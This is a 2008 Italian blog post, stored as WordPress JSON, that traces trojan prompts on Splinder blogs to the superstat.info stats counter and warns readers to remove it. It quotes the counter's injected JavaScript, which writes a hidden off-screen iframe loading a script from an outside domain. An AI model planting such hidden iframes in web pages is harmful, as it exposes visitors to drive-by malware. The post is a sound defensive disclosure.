{"id":5874,"date":"2008-03-26T15:51:17","date_gmt":"2008-03-26T15:51:17","guid":{"rendered":"http:\/\/xmau.com\/wp\/notiziole\/2008\/03\/26\/risolto_il_mist\/"},"modified":"2025-12-29T18:50:49","modified_gmt":"2025-12-29T17:50:49","slug":"risolto_il_mist","status":"publish","type":"post","link":"https:\/\/xmau.com\/notiziole\/2008\/03\/26\/risolto_il_mist\/","title":{"rendered":"Risolto il mistero dei dialer su splinder!"},"content":{"rendered":"<p>Domenica <a href=\"http:\/\/xmau.com\/notiziole\/arch\/200803\/004071.html\">avevo scritto<\/a> a proposito dei troiani che cercavano di intrufolarsi sul mio povero PC mentre navigavo sulle pagine di splinder. Oggi pomeriggio, mentre guardavo che succedeva <a href=\"http:\/\/www.copiascolla.splinder.com\/\">da Copiascolla,<\/a> mi sono visto in diretta il troiano che voleva cambiare la mia homepage (come se io non usassi SpyBot e TeaTimer per bloccare simili richieste :-) ) Mi sono messo a dare un&#8217;occhiata a quale parte del codice inserisse il tutto: dopo avere benedetto il fatto che Firefox ti permette di scrivere view-source: e visualizzare il sorgente di una pagina web invece che la pagina stessa, ho scoperto che il colpevole era il contatore delle statistiche. Se uno guarda <tt>http:\/\/stat.superstat.info\/counter.php<\/tt>, o almeno lo guardava quando ho provato io, avrebbe trovato questo simpatico pezzo di codice:<br \/>\n<tt>if ( parseInt(pr17) &lt;= parseInt(\"9\") &amp;&amp; parseInt(visit17) &lt; 2 ) {<\/tt><br \/>\n<tt>document.write('&lt;div style=\"position:absolute;left:-5000px;top:-5000px;visibility:hidden;\"&gt;');<\/tt><br \/>\n<tt>document.write('&lt;if'+'rame  frameborder=\"0\" src=\"http:\/\/a1p.cgste2.won-ppp.info\/htm\/cc1.php?p=55&amp;cc2=it\"&gt;&lt;'+'\/iframe&gt;' );<\/tt><br \/>\n<tt>document.write('&lt;\/div&gt;');<\/tt><br \/>\n<tt>};<\/tt><br \/>\nHo gi\u00e0 detto che io JavaScript non lo parlo, ma credo che sia abbastanza chiaro che viene aperto un iframe che chiama appunto uno script su won-ppp.info. Ho provato a guardare le informazioni di whois per superstat.info, e ho visto che il dominio \u00e8 &#8220;nascosto&#8221;, o meglio registrato da domainsbyproxy.com, che afferma di essere un utile servizio perch\u00e9 i dati pubblici dei dominii non siano preda di spammer ma a me sembra pi\u00f9 un sistema perch\u00e9 non si sappiano i dati degli spammer. L&#8217;ultimo aggiornamento del record \u00e8 dello scorso ottobre: visto che Gaia mi ha detto che quel contatore ce l&#8217;ha da almeno un anno, non penso sia impossibile che il dominio sia scaduto e sia stato preso da qualcuno che usi il servizio come copertura &#8211; s\u00ec, lo so, fa tanto James Bond o il negozio di fiori dei vecchi Alan Ford, ma che ci volete fare?<br \/>\nVabb\u00e8, se non avete capito nulla del pippone non \u00e8 importante, visto che quello che conta :-) \u00e8 solo quest&#8217;ultima riga. <b>Se avete un contatore su superstat.info, toglietelo subito<\/b>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Il colpevole per i trojan su Splinder non \u00e8 Splinder ma il contatore superstat.info<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"activitypub_content_warning":"","activitypub_content_visibility":"","activitypub_max_image_attachments":3,"activitypub_interaction_policy_quote":"anyone","activitypub_status":"","footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[30,9],"tags":[],"class_list":["post-5874","post","type-post","status-publish","format-standard","hentry","category-ia","category-ia-old"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/phh2yV-1wK","jetpack-related-posts":[{"id":5860,"url":"https:\/\/xmau.com\/notiziole\/2008\/03\/23\/troiani_via_spl\/","url_meta":{"origin":5874,"position":0},"title":"troiani via Splinder?","author":".mau.","date":"2008-03-23","format":false,"excerpt":"ogni tanto mi arrivano richieste di eseguire dei troiani... quando sono su Splinder.","rel":"","context":"In &quot;spam_phishing&quot;","block_context":{"text":"spam_phishing","link":"https:\/\/xmau.com\/notiziole\/category\/spam_phishing\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":3783,"url":"https:\/\/xmau.com\/notiziole\/2005\/10\/31\/toh\/","url_meta":{"origin":5874,"position":1},"title":"Toh.","author":".mau.","date":"2005-10-31","format":false,"excerpt":"questi cracker hanno colpito ancora.","rel":"","context":"In &quot;IA e informatica&quot;","block_context":{"text":"IA e informatica","link":"https:\/\/xmau.com\/notiziole\/category\/ia\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":8750,"url":"https:\/\/xmau.com\/notiziole\/2012\/02\/10\/splinder_e_mort\/","url_meta":{"origin":5874,"position":2},"title":"Splinder \u00e8 morto, ma&#8230;","author":".mau.","date":"2012-02-10","format":false,"excerpt":"Chiss\u00e0 chi - e quando - ha preparato i template web per il Corsera","rel":"","context":"In &quot;IA e informatica&quot;","block_context":{"text":"IA e informatica","link":"https:\/\/xmau.com\/notiziole\/category\/ia\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5584,"url":"https:\/\/xmau.com\/notiziole\/2007\/12\/19\/un_troiano_che\/","url_meta":{"origin":5874,"position":3},"title":"un troiano che non riesco a individuare","author":".mau.","date":"2007-12-19","format":false,"excerpt":"Per la precisione, so che il troiano c'\u00e8, ma non so cosa faccia... e no, non l'ho scaricato.","rel":"","context":"In &quot;spam_phishing&quot;","block_context":{"text":"spam_phishing","link":"https:\/\/xmau.com\/notiziole\/category\/spam_phishing\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6220,"url":"https:\/\/xmau.com\/notiziole\/2008\/07\/18\/accusare_ricevu\/","url_meta":{"origin":5874,"position":4},"title":"accusare ricevuta sarebbe stato meglio, ma&#8230;","author":".mau.","date":"2008-07-18","format":false,"excerpt":"Vediamo le cose positive: il troiano nel sito \u00e8 stato eliminato.","rel":"","context":"In &quot;spam_phishing&quot;","block_context":{"text":"spam_phishing","link":"https:\/\/xmau.com\/notiziole\/category\/spam_phishing\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2615,"url":"https:\/\/xmau.com\/notiziole\/2003\/12\/12\/che_ora_\/","url_meta":{"origin":5874,"position":5},"title":"Che ora \u00e8?","author":".mau.","date":"2003-12-12","format":false,"excerpt":"Stanotte la famigerata sindrome \"duue giorni dopo il fuso\" ha colpito ancora. Sono andato a dormire alle 22 mentre Anna guardava un film alla TV; mi sono svegliato a mezzanotte e venti quuando ha spento la televisione, e non mi sono riuscito ad addormentare se non alle 4 passate.","rel":"","context":"In &quot;io-2003&quot;","block_context":{"text":"io-2003","link":"https:\/\/xmau.com\/notiziole\/category\/io\/io-2003\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_likes_enabled":true,"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts\/5874","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/comments?post=5874"}],"version-history":[{"count":1,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts\/5874\/revisions"}],"predecessor-version":[{"id":35137,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/posts\/5874\/revisions\/35137"}],"wp:attachment":[{"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/media?parent=5874"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/categories?post=5874"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xmau.com\/notiziole\/wp-json\/wp\/v2\/tags?post=5874"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}